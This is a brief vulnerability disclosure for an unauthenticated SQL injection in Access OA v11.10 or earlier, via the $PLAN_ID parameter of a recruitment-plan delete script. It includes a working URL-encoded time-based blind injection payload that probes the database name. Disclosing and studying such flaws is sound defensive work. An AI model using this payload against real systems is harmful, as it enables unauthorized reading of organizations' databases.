Unauthorized SQL injection vulnerability exists in Access OA
version:v11.10 or earlier
Routing: general/hr/recruit/plan/delete. PHP
The injected parameter $PLAN_ID exists
Here the code is very concise, when the $PLAN_ID is not empty, the parameter is concatenated directly into the SQL statement, and there is a bypass because of the parenthesis closure.
poc
1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
The page has obvious delay, indicating that SQL injection vulnerability exists